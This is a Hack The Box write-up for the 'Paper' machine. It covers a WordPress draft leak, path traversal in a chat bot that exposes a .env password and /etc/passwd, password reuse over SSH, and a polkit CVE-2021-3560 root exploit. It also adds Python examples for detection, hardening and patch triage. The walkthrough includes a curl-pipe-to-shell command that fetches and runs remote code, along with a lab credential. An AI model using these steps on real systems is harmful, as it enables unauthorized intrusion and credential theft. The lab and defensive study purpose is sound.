HTB Paper Writeup
INFO
Machine IP = 10.10.11.143
OS = Linux
Level = Easy
Points = 20
SCANNING
- Nmap:
# Nmap 7.92 scan initiated Sun Mar 13 11:10:47 2022 as: nmap -sV -sC -oA /home/kali/Desktop/nmap/Paper 10.10.11.143
Nmap scan report for 10.10.11.143
Host is up (0.28s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_ssl-date: TLS randomness does not represent time
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods:
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
| tls-alpn:
|_ http/1.1
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 13 11:11:22 2022 -- 1 IP address (1 host up) scanned in 34.86 seconds
ENUMERATION
- Ports:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
Port 80 serves only the default "HTTP Server Test Page powered by CentOS"; there is no application content on the bare IP.
- Gobuster:
gobuster dir -u http://10.10.11.143 -w /usr/share/wordlists/dirb/big.txt -x php,txt,html,js -t 80 -o gobuster.log
Gobuster turns up nothing useful.
The TLS certificate on port 443 gives us nothing either: it is self-signed for localhost.localdomain, with no other names in the SAN.
The response headers on port 80 do leak something, though: an X-Backend-Server header names a vhost, office.paper. Let's add it to /etc/hosts.
echo "10.10.11.143 office.paper" | sudo tee -a /etc/hosts
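The vhost above was found by reading response headers by hand. As an added example (not part of the original writeup), the Python helper below generalises that check: it parses a raw HTTP response and reports every hostname found in headers that commonly carry internal names (Location, X-Backend-Server, Set-Cookie domains, CSP sources, Via, ...). The sample response is constructed for the demo; only the X-Backend-Server value mirrors what the box returned.

```python
"""Added example: spot hostname leaks in HTTP response headers.

Constructed sample data; run against real output with
`curl -sI http://TARGET/` piped into leaked_hostnames().
"""
import re
import sys

# Constructed sample response. The X-Backend-Server line mirrors the leak
# on the Paper box; the cookie and other headers are filler for the demo.
SAMPLE_RESPONSE = (
    "HTTP/1.1 403 Forbidden\r\n"
    "Date: Sun, 13 Mar 2022 16:10:47 GMT\r\n"
    "Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9\r\n"
    "X-Backend-Server: office.paper\r\n"
    "Set-Cookie: session=abc123; Domain=.office.paper; Path=/; HttpOnly\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><body>test page</body></html>"
)

# Headers whose values routinely contain host names (lower-cased).
HOST_HEADERS = {
    "location", "x-backend-server", "x-forwarded-host", "x-forwarded-server",
    "via", "content-security-policy", "access-control-allow-origin",
    "link", "set-cookie", "refresh",
}

# Dotted DNS name with an alphabetic TLD, so bare IPs and version strings
# such as 2.4.37 do not match.
HOSTNAME_RE = re.compile(
    r"\b((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63})\b", re.I
)


def parse_headers(raw):
    """Return [(name_lower, value), ...] from a raw HTTP response string."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    headers = []
    for line in head.split("\n")[1:]:  # skip the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.append((name.strip().lower(), value.strip()))
    return headers


def leaked_hostnames(raw, ignore=("localhost.localdomain",)):
    """Map each leaked hostname to the sorted list of headers it appeared in."""
    found = {}
    for name, value in parse_headers(raw):
        if name not in HOST_HEADERS:
            continue
        for host in HOSTNAME_RE.findall(value):
            host = host.lower().lstrip(".")  # cookie domains start with a dot
            if host in ignore:
                continue
            found.setdefault(host, set()).add(name)
    return {host: sorted(names) for host, names in found.items()}


def hosts_line(ip, raw):
    """Build the /etc/hosts line you would append for the discovered names."""
    names = sorted(leaked_hostnames(raw))
    return f"{ip} {' '.join(names)}" if names else ""


if __name__ == "__main__":
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_RESPONSE
    for host, headers in leaked_hostnames(data).items():
        print(f"{host}  <- {', '.join(headers)}")
```

Feed it `curl -sI` output for both the IP and each vhost you discover; a name that only appears once you send a particular Host header is itself a lead.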
On the new vhost office.paper, the footer, the theme and Wappalyzer (a browser extension) confirm a WordPress site running version 5.2.3. That version is affected by an unauthenticated view of private/draft posts (CVE-2019-17671).
One of the comments on the blog tells michael to remove the secret content from the drafts ASAP.
Normally reading drafts requires admin credentials, which we don't have yet; the bug lets us read them anyway by appending ?static=1 to the URL.
http://office.paper/?static=1
The result is the draft post, which reveals a new vhost and a registration URL. Let's add that vhost to /etc/hosts as well.
sudo nano /etc/hosts
10.10.11.143 office.paper chat.office.paper
Browse to the new vhost and open the registration URL; we get a registration form and register an account. After logging in, join the general room.
In the chat there is a bot, recyclops, that lets users list the sales directory with the list command and view a file's contents with the file command.
Using list and file we can read what is inside that directory.
Since list shows the contents of whatever path we hand it, let's try path traversal with ../ and look at the parent directory.
It works: we get the parent directory listing, and a hubot directory in it looks interesting. Listing it shows a .env file; .env files are typically used to store an application's secrets (credentials, tokens).
Let's read it with file ../hubot/.env.
It gives us a username, recyclops, and a password, Queenofblad3s!23.
Next, let's see which users exist on the box with file ../../../etc/passwd: dwight has a /bin/bash login shell, so that is the account to try.
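The bot's file command fails because it glues the user-supplied path onto its base directory and reads whatever that resolves to. As an added example (not the bot's real code, which is a hubot script), here is that pattern in Python beside a hardened version that resolves the final path and refuses anything that lands outside the sales directory. The directory layout and the .env contents are constructed in a temporary directory so it runs offline.

```python
"""Added example: path traversal in a 'read a file from this directory'
command, vulnerable join vs. resolved-and-checked join.

Sandbox layout and secret values are constructed for the demo.
"""
import os
import tempfile
from pathlib import Path


def build_sandbox():
    """Constructed mimic of the box: <home>/sales/ (what the bot should serve)
    and <home>/hubot/.env (the secret one directory up)."""
    home = Path(tempfile.mkdtemp(prefix="recyclops-demo-"))
    (home / "sales" / "sale").mkdir(parents=True)
    (home / "sales" / "sale" / "portfolio.txt").write_text("Q1 numbers\n")
    (home / "hubot").mkdir()
    (home / "hubot" / ".env").write_text(
        "ROCKETCHAT_USER=recyclops\nROCKETCHAT_PASSWORD=Queenofblad3s!23\n"
    )
    return home


def file_vulnerable(sales_dir, user_path):
    """The bot's pattern: join and read. '../hubot/.env' walks out of sales/."""
    with open(os.path.join(sales_dir, user_path)) as fh:
        return fh.read()


def file_hardened(sales_dir, user_path):
    """Resolve the joined path (collapsing '..' and following symlinks), then
    require it to still sit under the base directory before reading."""
    base = Path(sales_dir).resolve()
    target = (base / user_path).resolve()  # an absolute user_path replaces base
    try:
        target.relative_to(base)
    except ValueError:
        raise PermissionError(f"refusing to read outside {base}: {user_path!r}")
    if not target.is_file():
        raise FileNotFoundError(user_path)
    return target.read_text()


def demo(sales_dir):
    """Return what each variant does with the traversal from the writeup."""
    leaked = "Queenofblad3s!23" in file_vulnerable(sales_dir, "../hubot/.env")
    try:
        file_hardened(sales_dir, "../hubot/.env")
        blocked = False
    except PermissionError:
        blocked = True
    return {"vulnerable_leaks_secret": leaked, "hardened_blocks_traversal": blocked}


if __name__ == "__main__":
    sales = str(build_sandbox() / "sales")
    print(demo(sales))
```

The resolve-then-check order matters: checking the string for `..` before joining misses encoded variants and symlinks, while `realpath`/`resolve()` on the final path catches both.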
USER FLAG
- Privilege Escalation [User]
The bot's password is reused for dwight, so let's SSH in as dwight with it and read user.txt.
[dwight@paper ~]$ cat user.txt
ROOT FLAG
For local enumeration let's run linPEAS.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
linPEAS flags this machine as likely vulnerable to CVE-2021-3560, a polkit authentication bypass: a race condition lets an unprivileged user have privileged D-Bus method calls (for example, creating a new user through accounts-daemon) treated as authorized. Note that this is not Pwnkit, which is the separate pkexec bug CVE-2021-4034.
- Privilege Escalation [Root]
Let's download this Python exploit onto the machine and run it.
https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py
$ chmod +x CVE-2021-3560.py
$ python3 CVE-2021-3560.py
The exploit depends on winning a race against polkit, so it may take several attempts.
Once it succeeds we have a root shell and can read root.txt.
[root@paper]# cat root.txt
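Before firing a race-condition exploit it is worth confirming the target's polkit is actually in the affected range. As an added example (not from the writeup or from linPEAS), this Python helper triages the installed polkit for CVE-2021-3560: the bug was introduced in polkit 0.113 and fixed upstream in 0.119, but distributions backport both the bug and the fix, so the version is only a first pass and the package changelog is the confirming check. The package strings and changelog text below are constructed samples; the commands named in the comments (`rpm -q polkit`, `rpm -q --changelog polkit`, `pkaction --version`) are the real ones you would run on the box.

```python
"""Added example: triage a polkit install for CVE-2021-3560.

Facts used: vulnerable code landed in polkit 0.113, upstream fix in 0.119.
Sample package strings and changelog text are constructed.
"""
import re
import shutil
import subprocess

CVE = "CVE-2021-3560"
VULN_FIRST = (0, 113)   # first upstream release with the bug
FIXED = (0, 119)        # first upstream release with the fix

# Constructed samples in the formats you actually see on a host.
SAMPLE_RPM = "polkit-0.115-11.el8.x86_64"            # `rpm -q polkit`
SAMPLE_PKACTION = "pkaction version 0.115"            # `pkaction --version`
SAMPLE_DPKG = "policykit-1 0.105-26ubuntu1"           # `dpkg -l policykit-1`
SAMPLE_FIXED_CHANGELOG = (                            # `rpm -q --changelog polkit`
    "* Thu Jun 03 2021 Example Maintainer <maint@example.invalid> - 0.115-11.2\n"
    "- Fix " + CVE + " local privilege escalation (race in authentication)\n"
)


def parse_version(pkg):
    """Pull the upstream major.minor out of rpm NVRA, dpkg, or pkaction text."""
    m = re.search(r"\d+\.\d+", pkg)
    if not m:
        return None
    major, minor = m.group(0).split(".")
    return (int(major), int(minor))


def triage(pkg, changelog=""):
    """Return (status, detail). Status is one of:
    'patched', 'likely-vulnerable', 'not-in-range', 'unknown'."""
    version = parse_version(pkg)
    if version is None:
        return ("unknown", f"could not parse a version from {pkg!r}")
    if CVE in changelog:
        return ("patched", f"changelog for {pkg} references {CVE}")
    if VULN_FIRST <= version < FIXED:
        return ("likely-vulnerable",
                f"{pkg} is upstream 0.113..0.118 and the changelog has no {CVE} entry")
    # Outside the upstream range is NOT a clean bill of health: some
    # Debian/Ubuntu 0.105 builds carried the vulnerable code via backports.
    return ("not-in-range",
            f"{pkg} is outside 0.113..0.118; confirm against the distro advisory")


def from_system():
    """Run the real commands if present (rpm first, then pkaction)."""
    def run(*argv):
        return subprocess.run(argv, capture_output=True, text=True).stdout
    if shutil.which("rpm"):
        return triage(run("rpm", "-q", "polkit").strip(),
                      run("rpm", "-q", "--changelog", "polkit"))
    if shutil.which("pkaction"):
        return triage(run("pkaction", "--version").strip())
    return ("unknown", "neither rpm nor pkaction found")


if __name__ == "__main__":
    for sample in (SAMPLE_RPM, SAMPLE_PKACTION, SAMPLE_DPKG):
        print(sample, "->", triage(sample))
    print(SAMPLE_RPM, "+ fixed changelog ->", triage(SAMPLE_RPM, SAMPLE_FIXED_CHANGELOG))
```

On the defensive side the same facts apply in reverse: an unpatched polkit plus a running accounts-daemon is the combination the exploit needs, so patching polkit (or disabling accounts-daemon where it is not required) closes this path.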